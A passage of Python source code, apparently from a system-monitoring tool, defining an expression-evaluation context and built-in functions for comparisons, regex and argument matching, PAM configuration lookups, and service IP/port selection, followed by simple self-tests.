inspect.getdoc(GraphNodeExpression.functions[name])))\n return ret\n\n @staticmethod\n def RegisterFun(function):\n \"Function to register other functions as built-in GraphNodeExpression functions\"\n GraphNodeExpression.functions[function.__name__] = function\n return function\n\n\nclass ExpressionContext(object):\n \"\"\"This class defines a context for an expression evaluation.\n There are three parts to it:\n 1) A cache of values which have already been computed\n 2) A scope/context for expression evaluation - a default name prefix\n 3) A set of objects which implement the 'get' operation to be used in\n evaluating values of names\n\n We act like a dict, implementing these member functions:\n __iter__, __contains__, __len__, __getitem__ __setitem__, __delitem__,\n get, keys, has_key, clear, items\n \"\"\"\n\n def __init__(self, objects, prefix=None):\n \"Initialize our ExpressionContext\"\n self.objects = objects if isinstance(objects, (list, tuple)) else (objects,)\n self.prefix = prefix\n self.values = {}\n\n def __str__(self):\n ret = \"ExpressionContext(\"\n delim = \"[\"\n for obj in self.objects:\n ret += \"%s%s\" % (delim, str(obj))\n delim = \", \"\n ret += \"])\"\n return ret\n\n def keys(self):\n \"\"\"Return the complete set of keys in all our constituent objects\"\"\"\n retkeys = set()\n for obj in self.objects:\n for key in obj:\n retkeys.add(key)\n return retkeys\n\n @staticmethod\n def _fixvalue(v):\n \"Fix up a return value to avoid unicode values...\"\n return v\n if not isinstance(v, str) and hasattr(v, \"__iter__\") and not hasattr(v, \"__getitem__\"):\n ret = []\n for item in v:\n ret.append(ExpressionContext._fixvalue(item))\n return ret\n return v\n\n def get(self, key, alternative=None):\n \"\"\"Return the value associated with a key - cached or otherwise\n and cache it.\"\"\"\n if key in self.values:\n return self.values[key]\n for obj in self.objects:\n ret = None\n try:\n # print('GETTING %s in %s: %s' % (key, type(obj), obj), file=sys.stderr)\n ret = obj.get(key, None)\n if ret is None and hasattr(obj, \"deepget\"):\n ret = obj.deepget(key, None)\n # print('RETURNED %s' % ret, file=sys.stderr)\n # Too general exception catching...\n # pylint: disable=W0703\n except Exception as e:\n ret = None\n print(\"OOPS: self.objects = %s / exception %s\" % (str(self.objects), e), sys.stderr)\n print(\"OOPS: OUR object = %s (%s)\" % (str(obj), type(obj)), file=sys.stderr)\n ret = ExpressionContext._fixvalue(ret)\n if ret is not None:\n self.values[key] = ret\n return ret\n if self.prefix is not None:\n ret = ExpressionContext._fixvalue(obj.get(\"%s.%s\" % (self.prefix, key), None))\n if ret is not None:\n self.values[key] = ret\n return ret\n return alternative\n\n def clear(self):\n \"Clear our cached values\"\n self.values = {}\n\n def items(self):\n \"Return all items from our cache\"\n return self.values.items()\n\n def __iter__(self):\n \"Yield each key from self.keys() in turn\"\n for key in self.keys():\n yield key\n\n def __contains__(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def has_key(self, key):\n \"Return True if we can get() this key\"\n return self.get(key, None) is not None\n\n def __len__(self):\n \"Return the number of keys in our objects\"\n return len(self.keys())\n\n def __getitem__(self, key):\n \"Return the given item, or raise KeyError if not found\"\n ret = self.get(key, None)\n if ret is None:\n raise KeyError(key)\n return ret\n\n def __setitem__(self, key, value):\n \"Cache the value associated with this key\"\n self.values[key] = value\n\n def __delitem__(self, key):\n \"Remove the cache value associated with this key\"\n del self.values[key]\n\n\n@GraphNodeExpression.RegisterFun\ndef IGNORE(_ignoreargs, _ignorecontext):\n \"\"\"Function to ignore its argument(s) and return True all the time.\n This is a special kind of no-op in that it is used to override\n and ignore an underlying rule. It is expected that its arguments\n will explain why it is being ignored in this rule set.\n \"\"\"\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef EQ(args, _context):\n \"\"\"Function to return True if each non-None argument in the list matches\n every non-None argument and at least one of its subsequent arguments are not None.\n \"\"\"\n # print('EQ(%s) =>?' % str(args), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if not isinstance(val, type(val0)):\n if str(val0) != str(val):\n return False\n elif val0 != val:\n return False\n anymatch = True\n # print('EQ(%s) => %s' % (str(args), str(anymatch)), file=sys.stderr)\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef NE(args, _context):\n \"\"\"Function to return True if no non-None argument in the list matches\n the first one or None if all subsequent arguments are None\"\"\"\n # print('NE(%s, %s)' % (args[0], str(args[1:])), file=sys.stderr)\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n # print('+NE(%s, %s) (%s, %s)' % (val0, val, type(val0), type(val)), file=sys.stderr)\n if val is None:\n return None\n if val0 == val or str(val0) == str(val):\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 >= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GT(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than the first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 <= val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef LE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n less than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 > val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef GE(args, _context):\n \"\"\"Function to return True if each non-None argument in the list is\n greater than or equal to first one or None if all subsequent arguments are None\"\"\"\n val0 = args[0]\n if val0 is None:\n return None\n anymatch = None\n for val in args[1:]:\n if val is None:\n continue\n if val0 < val:\n return False\n anymatch = True\n return anymatch\n\n\n@GraphNodeExpression.RegisterFun\ndef IN(args, _context):\n \"\"\"Function to return True if first argument is in the list that follows.\n If the first argument is iterable, then each element in it must be 'in'\n the list that follows.\n \"\"\"\n\n val0 = args[0]\n if val0 is None:\n return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n anyTrue = False\n for elem in val0:\n if elem is None:\n continue\n if elem not in args[1:] and str(elem) not in args[1:]:\n return False\n anyTrue = True\n return True if anyTrue else None\n # Not an iterable: string, int, NoneType, etc.\n if val0 is None:\n return None\n # print(type(val0), val0, type(args[1]), args[1], file=sys.stderr)\n return val0 in args[1:] or str(val0) in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOTIN(args, _context):\n \"Function to return True if first argument is NOT in the list that follows\"\n val0 = args[0]\n if val0 is None:\n return None\n if hasattr(val0, \"__iter__\") and not isinstance(val0, six.string_types):\n # Iterable\n for elem in val0:\n if elem in args[1:] or str(elem) in args[1:]:\n return False\n return True\n return val0 not in args[1:] and str(val0) not in args[1:]\n\n\n@GraphNodeExpression.RegisterFun\ndef NOT(args, _context):\n \"Function to Negate the Truth value of its single argument\"\n try:\n val0 = args[0]\n except TypeError:\n val0 = args\n return None if val0 is None else not val0\n\n\ndef _str_to_regexflags(s):\n r\"\"\"Transform a string of single character regex flags to the corresponding integer.\n Note that the flag names are all the Python single character flag names from the 're' module.\n They are as follows:\n A perform 8-bit ASCII-only matching (Python 3 only)\n I Perform non-case-sensitive matching\n L Use locale settings for \\w, =W, \\b and \\B\n M Multi-line match - allow ^ and $ to apply to individual lines in the string\n S Allow the dot character to also match a newline\n U Uses information from the Unicode character properties for \\w, \\W, \\b and \\B.\n (python 2 only)\n X Ignores unescaped whitespace and comments in the pattern string.\n \"\"\"\n\n flags = 0\n if s is not None:\n for char in s:\n if char == \"A\":\n if hasattr(re, \"ASCII\"):\n flags |= getattr(re, \"ASCII\")\n elif char == \"I\":\n flags |= re.IGNORECASE\n elif char == \"L\":\n flags |= re.LOCALE\n elif char == \"M\":\n flags |= re.MULTILINE\n elif char == \"S\":\n flags |= re.DOTALL\n elif char == \"U\":\n flags |= re.UNICODE\n elif char == \"X\":\n flags |= re.VERBOSE\n return flags\n\n\n_regex_cache = {}\n\n\ndef _compile_and_cache_regex(regexstr, flags=None):\n \"Compile and cache a regular expression with the given flags\"\n cache_key = \"%s//%s\" % (str(regexstr), str(flags))\n if cache_key in _regex_cache:\n regex = _regex_cache[cache_key]\n else:\n regex = re.compile(regexstr, _str_to_regexflags(flags))\n _regex_cache[cache_key] = regex\n return regex\n\n\n@GraphNodeExpression.RegisterFun\ndef match(args, _context):\n \"\"\"Function to return True if first argument matches the second argument (a regex)\n - optional 3rd argument is RE flags\"\"\"\n lhs = str(args[0])\n rhs = args[1]\n if lhs is None or rhs is None:\n return None\n flags = args[2] if len(args) > 2 else None\n regex = _compile_and_cache_regex(rhs, flags)\n return regex.search(lhs) is not None\n\n\n@GraphNodeExpression.RegisterFun\ndef argequals(args, context):\n \"\"\"\n usage: argequals name-to-search-for [list-to-search]\n\n A function which searches a list for an argument of the form name=value.\n The value '$argv' is the default name of the list to search.\n If there is a second argument, then that second argument is an expression\n expected to yield an iterable to search in for the name=value string instead of '$argv'\n \"\"\"\n # print('ARGEQUALS(%s)' % (str(args)), file=sys.stderr)\n if len(args) > 2 or len(args) < 1:\n return None\n definename = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n # print('SEARCHING in %s FOR %s in %s' % (argname, definename, listtosearch), file=sys.stderr)\n if listtosearch is None:\n return None\n prefix = \"%s=\" % definename\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n for elem in listtosearch:\n if elem.startswith(prefix):\n return elem[len(prefix) :]\n except: # No matter the cause of failure, return None...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef argmatch(args, context):\n \"\"\"\n usage: argmatch regular-expression [list-to-search [regex-flags]]\n\n Argmatch searches a list for an value that matches a given regex.\n The regular expression is given by the argument in args, and the list 'argv'\n defaults to be the list of arguments to be searched.\n\n If there are two arguments in args, then the first argument is the\n array value to search in for the regular expression string instead of 'argv'\n\n If the regex contains a parenthesized groups, then the value of the first such group\n is returned, otherwise the part of the argument that matches the regex is returned.\n\n Note that this regular expression is 'anchored' that is, it starts with the first character\n in the argument. If you want it to be floating, then you may want to start your regex\n with '.*' and possibly parenthesize the part you want to return.\n \"\"\"\n # print('ARGMATCH(%s)' % (str(args)), file=sys.stderr)\n # print('ARGMATCHCONTEXT(%s)' % (str(context)), file=sys.stderr)\n if len(args) > 3 or len(args) < 1:\n return None\n regexstr = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n flags = args[2] if len(args) >= 3 else None\n listtosearch = GraphNodeExpression.evaluate(argname, context)\n if listtosearch is None:\n return None\n\n # W0702: No exception type specified for except statement\n # pylint: disable=W0702\n try:\n # print(regex: /%s/' % regexstr, file=sys.stderr)\n regex = _compile_and_cache_regex(regexstr, flags)\n # print('Matching against list %s' % (str(listtosearch)), file=sys.stderr)\n for elem in listtosearch:\n # print('Matching %s against %s' % (regexstr, elem), file=sys.stderr)\n matchobj = regex.match(elem)\n if matchobj:\n # Did they specify any parenthesized groups?\n if len(matchobj.groups()) > 0:\n # yes - return the (first) parenthesized match\n return matchobj.groups()[0]\n else:\n # no - return everything matched\n return matchobj.group()\n except: # No matter the cause of failure, return None...\n # That includes ill-formed regular expressions...\n pass\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef flagvalue(args, context):\n \"\"\"\n usage: flagvalue flag-name [list-to-search]\n A function which searches a list for a -flag and returns\n the value of the string which is the next argument.\n The -flag is given by the argument in args, and the list 'argv'\n is assumed to be the list of arguments.\n If there are two arguments in args, then the first argument is the\n array value to search in for the -flag string instead of 'argv'\n The flag given must be the entire flag complete with - character.\n For example -X or --someflag.\n \"\"\"\n if len(args) > 2 or len(args) < 1:\n return None\n flagname = args[0]\n argname = args[1] if len(args) >= 2 else \"$argv\"\n\n progargs = GraphNodeExpression.evaluate(argname, context)\n argslen = len(progargs)\n flaglen = len(flagname)\n for pos in range(0, argslen):\n progarg = progargs[pos]\n progarglen = len(progarg)\n if progarg.startswith(flagname):\n if progarg == flagname:\n # -X foobar\n if (pos + 1) < argslen:\n return progargs[pos + 1]\n elif flaglen == 2 and progarglen > flaglen:\n # -Xfoobar -- single character flags only\n return progarg[2:]\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef OR(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('OR(%s)' % (str(args)), file=sys.stderr)\n if len(args) < 1:\n return None\n anyfalse = False\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is not None:\n if value:\n return value\n else:\n anyfalse = True\n return False if anyfalse else None\n\n\n@GraphNodeExpression.RegisterFun\ndef AND(args, context):\n \"\"\"\n A function which evaluates each expression in turn, and returns the value\n of the first expression which is not None - or None\n \"\"\"\n # print('AND(%s)' % (str(args)), file=sys.stderr)\n argisnone = True\n if len(args) < 1:\n return None\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n argisnone = None\n elif not value:\n # print('AND(%s) => False' % (str(args)), file=sys.stderr)\n return False\n # print('AND(%s) => %s' % (str(args), argisnone), file=sys.stderr)\n return argisnone\n\n\n@GraphNodeExpression.RegisterFun\ndef ATTRSEARCH(args, context):\n \"\"\"\n Search our first context object for an attribute with the given name and (if supplied) value.\n If 'value' is None, then we simply search for the given name.\n We return True if we found what we were looking for, and False otherwise.\n\n The object to search in is is args[0], the name is args[1],\n and the optional desired value is args[2].\n \"\"\"\n return True if FINDATTRVALUE(args, context) else False\n # return FINDATTRVALUE(args, context) is not None\n # These are equivalent. Not sure which is clearer...\n\n\n@GraphNodeExpression.RegisterFun\ndef FINDATTRVALUE(args, _context):\n \"\"\"\n Search our first context object for an attribute with the given name and (if supplied) value.\n We return the value found, if it is in the context objects, or None if it is not\n If 'value' is None, then we simply search for the given name.\n\n We return True if the desired value is None, and so is the value we found -\n otherwise we return the value associated with 'name' or None if not found.\n\n The object to search in is is args[0], the name is args[1],\n and the optional desired value is args[2].\n \"\"\"\n if len(args) not in (2, 3):\n print(\"WRONG NUMBER OF ARGUMENTS (%d) TO FINDATTRVALUE\" % (len(args)), file=sys.stderr)\n return None\n desiredvalue = args[2] if len(args) > 2 else None\n return _attrfind(args[0], args[1], desiredvalue)\n\n\ndef _is_scalar(obj):\n 'Return True if this object is a pyConfigContext/JSON \"scalar\"'\n return isinstance(obj, (six.string_types, int, float, bool, pyNetAddr))\n\n\ndef _attrfind(obj, name, desiredvalue):\n \"\"\"\n Recursively search the given object for an attribute with the given name\n and value. If 'value' is None, then we simply search for the given name.\n\n We return True if the desired value is None, and the value we found is also None -\n otherwise we return the value associated with 'name' or None if not found.\n \"\"\"\n if _is_scalar(obj):\n return None\n if hasattr(obj, \"__getitem__\"):\n for key in obj:\n keyval = obj[key]\n if key == name:\n if desiredvalue is None:\n return keyval if keyval is not None else True\n elif keyval == desiredvalue or str(keyval) == str(desiredvalue):\n # We use str() to allow pyNetAddr objects to compare equal\n # and the possibility of type mismatches (strings versus integers, for example)\n # This may also improve the chance of floating point compares working as\n # intended.\n return keyval\n elif hasattr(obj, \"__iter__\"):\n for elem in obj:\n ret = _attrfind(elem, name, desiredvalue)\n if ret is not None:\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef PAMMODARGS(args, _context):\n \"\"\"\n We pass the following arguments to PAMSELECTARGS:\n section - the section value to select from\n service - service type to search for\n module - the module to select arguments from\n argument - the arguments to select\n\n We return the arguments from the first occurence of the module that we find.\n \"\"\"\n # print('PAMMODARGS(%s)' % (str(args)), file=sys.stderr)\n if len(args) != 4:\n print(\"WRONG NUMBER OF ARGUMENTS (%d) TO PAMMODARGS\" % (len(args)), file=sys.stderr)\n return False\n section = args[0]\n reqservice = args[1]\n reqmodule = args[2]\n reqarg = args[3]\n\n if section is None:\n # print('Section is None in PAM object', file=sys.stderr)\n return None\n # Each section is a list of lines\n for line in section:\n # Each line is a dict with potential keys of:\n # - service: a keyword saying what kind of service\n # - filename:(only for includes)\n # - type: dict of keywords (requisite, required, optional, etc)\n # - module: Module dict keywords with:\n # - path - pathname of module ending in .so\n # - other arguments as per the module's requirements\n # simple flags without '=' values show up with True as value\n #\n if \"service\" not in line or line[\"service\"] != reqservice:\n # print('Service %s not in PAM line %s' % (reqservice, str(line)), file=sys.stderr)\n continue\n if \"module\" not in line:\n # print('\"module\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n if \"path\" not in line[\"module\"]:\n # print('\"path\" not in PAM module %s' % str(line['module']), file=sys.stderr)\n # print('\"path\" not in PAM line %s' % str(line), file=sys.stderr)\n continue\n modargs = line[\"module\"]\n if reqmodule != \"ANY\" and (\n modargs[\"path\"] != reqmodule and modargs[\"path\"] != (reqmodule + \".so\")\n ):\n # print('Module %s not in PAM line %s' % (reqmodule, str(line)), file=sys.stderr)\n continue\n ret = modargs[reqarg] if reqarg in modargs else None\n if ret is None and reqmodule == \"ANY\":\n continue\n # print('RETURNING %s from %s' % (ret, str(line)), file=sys.stderr)\n return ret\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef MUST(args, _unused_context):\n \"Return True if all args are True. A None arg is the same as False to us\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is None or not arg:\n # print('+++MUST returns FALSE', file=sys.stderr)\n return False\n # print('+++MUST returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef NONEOK(args, _unused_context):\n \"Return True if all args are True or None - that is, if no args are False\"\n # print('CALLING MUST%s' % str(tuple(args)), file=sys.stderr)\n if not hasattr(args, \"__iter__\") or isinstance(args, six.string_types):\n args = (args,)\n for arg in args:\n if arg is not None and not arg:\n # print('+++NONEOK returns FALSE', file=sys.stderr)\n return False\n # print('+++NONEOK returns TRUE', file=sys.stderr)\n return True\n\n\n@GraphNodeExpression.RegisterFun\ndef FOREACH(args, context):\n \"\"\"Applies the (string) expression (across all values in the context,\n returning the 'AND' of the evaluation of the expression-evaluations\n across the top level values in the context. It stops evaluation on\n the first False return.\n\n The final argument is the expression (predicate) to be evaluated. Any\n previous arguments in 'args' are expressions to be evaluated in the context\n 'context' then used as the 'context' for this the expression in this FOREACH.\n Note that this desired predicate is a _string_, which is then evaluated\n (like 'eval'). It is not a normal expression, but a string containing\n an expression. You _will_ have to quote it.\n\n When given a single argument, it will evaluate the string expression\n for each of top-level values in the object. Normally this would be the 'data'\n portion of a discovery object. So, for example, if each of the top level keys\n is a file name and the values are file properties, then it will evaluate the\n expression on the properties of every file in the object.\n\n If you need to evaluate this across all the elements of a sub-object named\n \"filenames\" in the top level \"data\" object then you give \"$filenames\" as the\n context argument, and your predicate as the expression like this:\n [\"$filenames\", \"\"].\n\n The code to do this is simpler than the explanation ;-)\n \"\"\"\n anynone = False\n if len(args) == 1:\n objectlist = context.objects\n else:\n objectlist = [GraphNodeExpression.evaluate(obj, context) for obj in args[:-1]]\n\n expressionstring = args[-1]\n if not isinstance(expressionstring, six.string_types):\n print(\n \"FOREACH expression must be a string, not %s\" % type(expressionstring), file=sys.stderr\n )\n return False\n # print('OBJECTLIST is:', objectlist, file=sys.stderr)\n for obj in objectlist:\n # print('OBJ is:', obj, file=sys.stderr)\n for key in obj:\n item = obj[key]\n if not hasattr(item, \"__contains__\") or not hasattr(item, \"__iter__\"):\n print(\"UNSUITABLE FOREACH CONTEXT[%s]: %s\" % (key, item), file=sys.stderr)\n continue\n # print(sys.stderr, 'CREATING CONTEXT[%s]: %s' % (key, item), file=sys.stderr)\n itemcontext = ExpressionContext(item)\n # print('CONTEXT IS:', itemcontext, file=sys.stderr)\n value = GraphNodeExpression.evaluate(expressionstring, itemcontext)\n # print('VALUE of %s IS [%s] in context: %s' % (str(args), value, item), file=sys.stderr)\n if value is None:\n anynone = True\n elif not value:\n return False\n return None if anynone else True\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseOR(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise OR of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = 0\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result |= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef bitwiseAND(args, context):\n \"\"\"\n A function which evaluates the each expression and returns the bitwise AND of\n all the expressions given as arguments\n \"\"\"\n if len(args) < 2:\n return None\n result = int(args[0])\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value is None:\n return None\n result &= int(value)\n return result\n\n\n@GraphNodeExpression.RegisterFun\ndef is_upstartjob(args, context):\n \"\"\"\n Returns \"true\" if any of its arguments names an upstart job, \"false\" otherwise\n If no arguments are given, it returns whether this system has upstart enabled.\n \"\"\"\n\n from monitoring import MonitoringRule\n\n agentcache = MonitoringRule.compute_available_agents(context)\n\n if \"upstart\" not in agentcache or len(agentcache[\"upstart\"]) == 0:\n return \"false\"\n\n for arg in args:\n value = GraphNodeExpression.evaluate(arg, context)\n if value in agentcache[\"upstart\"]:\n return \"true\"\n return len(args) == 0\n\n\ndef _regexmatch(key):\n \"\"\"Handy internal function to pull out the IP and port into a pyNetAddr\n Note that the format is the format used in the discovery information\n which in turn is the format used by netstat.\n This is not a \"standard\" format, but it's what netstat uses - so it's\n what we use.\n \"\"\"\n mobj = ipportregex.match(key)\n if mobj is None:\n return None\n (ip, port) = mobj.groups()\n ipport = pyNetAddr(ip, port=int(port))\n if ipport.isanyaddr():\n if ipport.addrtype() == ADDR_FAMILY_IPV4:\n ipport = pyNetAddr(\"127.0.0.1\", port=ipport.port())\n else:\n ipport = pyNetAddr(\"::1\", port=ipport.port())\n return ipport\n\n\ndef _collect_ip_ports(service):\n \"Collect out complete set of IP/Port combinations for this service\"\n portlist = {}\n for key in service.keys():\n ipport = _regexmatch(key)\n if ipport.port() == 0:\n continue\n port = ipport.port()\n if port in portlist:\n portlist[port].append(ipport)\n else:\n portlist[port] = [ipport]\n return portlist\n\n\n# Netstat format IP:port pattern\nipportregex = re.compile(\"(.*):([^:]*)$\")\n\n\ndef selectanipport(arg, _context, preferlowestport=True, preferv4=True):\n \"\"\"This function searches discovery information for a suitable IP\n address/port combination to go with the service.\n \"\"\"\n\n # print('SELECTANIPPORT(%s)' % arg, file=sys.stderr)\n try:\n\n portlist = _collect_ip_ports(arg)\n portkeys = list(portlist.keys())\n if preferlowestport:\n portkeys.sort()\n for p in portlist[portkeys[0]]:\n if preferv4:\n if p.addrtype() == ADDR_FAMILY_IPV4:\n return p\n else:\n if p.addrtype() == ADDR_FAMILY_IPV6:\n return p\n return portlist[portkeys[0]][0]\n except (KeyError, ValueError, TypeError, IndexError):\n # Something is hinky with this data\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceip(args, context):\n \"\"\"\n This function searches discovery information for a suitable concrete IP\n address for a service.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n # print('SERVICEIP(%s)' % str(args), file=sys.stderr)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n # print('serviceip.SELECTANIPPORT(%s)' % (nmap), file=sys.stderr)\n ipport = selectanipport(nmap, context)\n if ipport is None:\n continue\n ipport.setport(0) # Make sure return value doesn't include the port\n # print('IPPORT(%s)' % str(ipport), file=sys.stderr)\n return str(ipport)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceport(args, context):\n \"\"\"\n This function searches discovery information for a suitable port for a service.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n # print('SERVICEPORT ARGS are %s' % (str(args)), file=sys.stderr)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n port = selectanipport(nmap, context).port()\n if port is None:\n continue\n return str(port)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef serviceipport(args, context):\n \"\"\"\n This function searches discovery information for a suitable ip:port combination.\n The argument to this function tells it an expression that will give\n it the hash table (map) of IP/port combinations for this service.\n The return value is a legal ip:port combination for the given\n address type (ipv4 or ipv6)\n \"\"\"\n if len(args) == 0:\n args = (\"$procinfo.listenaddrs\",)\n for arg in args:\n nmap = GraphNodeExpression.evaluate(arg, context)\n if nmap is None:\n continue\n ipport = selectanipport(nmap, context)\n if ipport is None:\n continue\n return str(ipport)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef basename(args, context):\n \"\"\"\n This function returns the basename from a pathname.\n If no pathname is supplied, then the executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n # print('BASENAME(%s) => %s' % ( pathname, file=sys.stderr)\n # , os.path.basename(pathname))\n return os.path.basename(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef dirname(args, context):\n \"\"\"\n This function returns the directory name from a pathname.\n If no pathname is supplied, then the discovered service executable name is assumed.\n \"\"\"\n if isinstance(args, six.string_types):\n args = (args,)\n if len(args) == 0:\n args = (\"$pathname\",) # Default to the name of the executable\n for arg in args:\n pathname = GraphNodeExpression.evaluate(arg, context)\n if pathname is None:\n continue\n return os.path.dirname(pathname)\n return None\n\n\n@GraphNodeExpression.RegisterFun\ndef hascmd(args, context):\n \"\"\"\n This function returns True if the given list of commands are all present on the given Drone.\n It determines this by looking at the value of $_init_commands.data\n \"\"\"\n cmdlist = GraphNodeExpression.evaluate(\"$_init_commands.data\", context)\n for arg in args:\n if cmdlist is None or arg not in cmdlist:\n return None\n return True\n\n\nif __name__ == \"__main__\":\n\n def simpletests():\n \"\"\"These tests don't require a real context\"\"\"\n assert NOT((True,), None) is False\n assert NOT((False,), None) is True\n assert EQ((1, 1, \"1\"), None) is True\n assert NOT(EQ((1,), None), None) is None\n assert MUST(NOT(EQ((1,), None), None), None) is False\n assert NONEOK(NOT(EQ((1,), None), None), None) is True\n assert NOT(EQ((1, 1, \"2\"), None), None) is True\n assert NOT(EQ((0, 0, \"2\"), None), None) is True\n assert EQ((\"a\", \"a\", \"a\"), None) is True\n assert EQ((\"0\", \"0\", 0), None) is True\n assert NOT(NE((1, 1, \"1\"), None), None) is True\n assert NOT(NE((1,), None), None) is None\n assert NONEOK(NOT(NE((1,), None), None), None) is True\n assert MUST(NOT(NE((1,), None), None), None) is False\n assert NOT(NE((1, 1, \"2\"), None), None) is True\n assert NOT(NE((0, 0, \"2\"), None), None) is True\n assert NOT(NE((\"a\", \"a\", \"a\"), None), None) is True\n assert NOT(NE((\"0\", \"0\", 0), None), None) is True\n assert LE((1, 1), None) is True\n assert LE((1, 5), None) is True\n assert NOT(LT((1, 1), None), None) is True\n assert LT((1, 5), None) is True\n assert NOT(GT((1, 1), None), None) is True\n assert GE((1, 1), None) is True\n assert IN((1, 2, 3, 4, 1), None) is True\n assert IN((1, 2, 3, 4, \"1\"), None) is True\n assert NOT(IN((1, 2, 3, 4), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, 1), None), None) is True\n assert NOT(NOTIN((1, 2, 3, 4, \"1\"), None), None) is True\n assert NOTIN((1, 2, 3, 4), None) is True\n assert bitwiseOR((1, 2, 4), None) == 7\n assert bitwiseOR((1, 2, \"4\"), None) == 7\n assert bitwiseAND((7, 3), None) == 3\n assert bitwiseAND((7, 1, \"2\"), None) == 0\n assert bitwiseAND((\"15\", \"7\", \"3\"), None) == 3\n assert IGNORE((False, False, False), None)\n assert MUST(None, None) is False\n assert MUST(True, None) is True\n assert MUST(False, None) is False\n assert NONEOK(None, None) is True\n assert NONEOK(True, None) is True\n assert NONEOK(False, None) is False\n assert match((\"fred\", \"fre\"), None)\n assert match((\"fred\", \"FRE\"), None) is False\n assert match((\"fred\", \"FRE\", \"I\"), None) is True\n assert basename((\"/dev/null\"), None) == \"null\"\n assert dirname((\"/dev/null\"), None) == \"/dev\"\n print(\"Simple tests passed.\", file=sys.stderr)\n\n def contexttests():\n \"GraphNodeExpression tests that need a context\"\n\n lsattrs = \"\"\"{\n \"/var/log/audit/\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"d\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":true, \"setid\":false}, \"group\": {\"read\":true, \"write\":false, \"exec\":true, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0750\"},\n \"/var/log/audit/audit.log\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":true, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0600\"},\n \"/var/log/audit/audit.log.1\": {\"owner\": \"root\", \"group\": \"root\", \"type\": \"-\", \"perms\": {\"owner\":{\"read\":true, \"write\":false, \"exec\":false, \"setid\":false}, \"group\": {\"read\":false, \"write\":false, \"exec\":false, \"setid\":false}, \"other\": {\"read\":false, \"write\":false, \"exec\":false}, \"sticky\":false}, \"octal\": \"0400\"}\n}\"\"\"\n lscontext = ExpressionContext(pyConfigContext(lsattrs))\n\n Pie_context = ExpressionContext(\n (\n pyConfigContext(\n 